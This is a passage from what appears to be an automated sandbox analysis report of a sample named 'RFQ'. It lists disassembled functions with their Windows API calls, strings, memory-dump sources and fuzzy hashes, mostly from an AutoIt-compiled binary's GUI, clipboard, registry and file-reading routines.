                                                                          • SetCursor.USER32(00000000), ref: 004307BB
                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                          • SetCursor.USER32(00000000), ref: 004307D3
                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                          • SetCursor.USER32(00000000), ref: 004307EB
                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                          • SetCursor.USER32(00000000), ref: 00430803
                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                          • SetCursor.USER32(00000000), ref: 0043081B
                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                          • SetCursor.USER32(00000000), ref: 00430833
                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                          • SetCursor.USER32(00000000), ref: 0043084B
                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                          • SetCursor.USER32(00000000), ref: 00430863
                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                          • SetCursor.USER32(00000000), ref: 0043087B
                                                                          • SetCursor.USER32(00000000), ref: 00430887
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                          • SetCursor.USER32(00000000), ref: 0043089F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$Load
                                                                          • String ID:
                                                                          • API String ID: 1675784387-0
                                                                          • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                          • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                          • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                          • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                          Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSysColor.USER32(0000000E), ref: 00430913
                                                                          • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                          • GetSysColor.USER32(00000012), ref: 00430933
                                                                          • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                          • GetSysColor.USER32(0000000F), ref: 00430959
                                                                          • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                          • GetSysColor.USER32(00000011), ref: 00430979
                                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                          • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                          • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                          • SelectObject.GDI32(?,?), ref: 004309B4
                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                          • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                          • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                          • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                          • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                          • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                          • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                          • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                          • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                          • DeleteObject.GDI32(?), ref: 00430AE9
                                                                          • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                          • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                          • String ID:
                                                                          • API String ID: 1582027408-0
                                                                          • Opcode ID: 86b869e5b8bb6c2dba163effb8278b4f001f0824fd106c928e18bea154194c17
                                                                          • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                          • Opcode Fuzzy Hash: 86b869e5b8bb6c2dba163effb8278b4f001f0824fd106c928e18bea154194c17
                                                                          • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                          Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseConnectCreateRegistry
                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                          • API String ID: 3217815495-966354055
                                                                          • Opcode ID: cce921d97e24dbf253ef9f1627752c5d4fb6d5c9aca8633edc33abbdd9bc0d54
                                                                          • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                          • Opcode Fuzzy Hash: cce921d97e24dbf253ef9f1627752c5d4fb6d5c9aca8633edc33abbdd9bc0d54
                                                                          • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                          Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCursorPos.USER32(?), ref: 004566AE
                                                                          • GetDesktopWindow.USER32 ref: 004566C3
                                                                          • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                          • DestroyWindow.USER32(?), ref: 00456746
                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                          • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                          • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                          • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                          • IsWindowVisible.USER32(?), ref: 0045682C
                                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                          • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                          • GetWindowRect.USER32(?,?), ref: 00456873
                                                                          • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                          • CopyRect.USER32(?,?), ref: 004568BE
                                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                          • String ID: ($,$tooltips_class32
                                                                          • API String ID: 225202481-3320066284
                                                                          • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                          • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                          • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                          • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                          Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                          • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                          • CloseClipboard.USER32 ref: 0046DD0D
                                                                          • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                          • CloseClipboard.USER32 ref: 0046DD41
                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                          • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                          • CloseClipboard.USER32 ref: 0046DD99
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                          • String ID:
                                                                          • API String ID: 15083398-0
                                                                          • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                          • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                          • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                          • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                          Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                          • GetClientRect.USER32(?,?), ref: 00471D05
                                                                          • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                          • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                          • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                          • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                          • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                          • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                          • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                          • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                          • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                          • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                          • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                          • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                          • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                          • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                          • String ID: @$AutoIt v3 GUI
                                                                          • API String ID: 867697134-3359773793
                                                                          • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                          • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                          • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                          • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                          Function 00433A13 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 196COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                          • API String ID: 1503153545-1459072770
                                                                          • Opcode ID: 317b836bd45d303022c8cfe41fd482541af156a870e12d87d8544c7d52709fdd
                                                                          • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                          • Opcode Fuzzy Hash: 317b836bd45d303022c8cfe41fd482541af156a870e12d87d8544c7d52709fdd
                                                                          • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                          Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsicoll$__wcsnicmp
                                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                          • API String ID: 790654849-32604322
                                                                          • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                          • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                          • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                          • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                          Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 37a5c787a7b2188dc8d5479775b41731b0c96863aaa01ab20318fba061c3c2a8
                                                                          • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                          • Opcode Fuzzy Hash: 37a5c787a7b2188dc8d5479775b41731b0c96863aaa01ab20318fba061c3c2a8
                                                                          • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                          Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                                          • _fseek.LIBCMT ref: 00452B3B
                                                                          • __wsplitpath.LIBCMT ref: 00452B9B
                                                                          • _wcscpy.LIBCMT ref: 00452BB0
                                                                          • _wcscat.LIBCMT ref: 00452BC5
                                                                          • __wsplitpath.LIBCMT ref: 00452BEF
                                                                          • _wcscat.LIBCMT ref: 00452C07
                                                                          • _wcscat.LIBCMT ref: 00452C1C
                                                                          • __fread_nolock.LIBCMT ref: 00452C53
                                                                          • __fread_nolock.LIBCMT ref: 00452C64
                                                                          • __fread_nolock.LIBCMT ref: 00452C83
                                                                          • __fread_nolock.LIBCMT ref: 00452C94
                                                                          • __fread_nolock.LIBCMT ref: 00452CB5
                                                                          • __fread_nolock.LIBCMT ref: 00452CC6
                                                                          • __fread_nolock.LIBCMT ref: 00452CD7
                                                                          • __fread_nolock.LIBCMT ref: 00452CE8
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                          • __fread_nolock.LIBCMT ref: 00452D78
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                          • String ID:
                                                                          • API String ID: 2054058615-0
                                                                          • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                          • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                                          • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                          • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                                          Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window
                                                                          • String ID: 0
                                                                          • API String ID: 2353593579-4108050209
                                                                          • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                          • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                          • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                          • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                          Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                          • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                          • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                          • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                          • GetSysColor.USER32(0000000F), ref: 0044A131
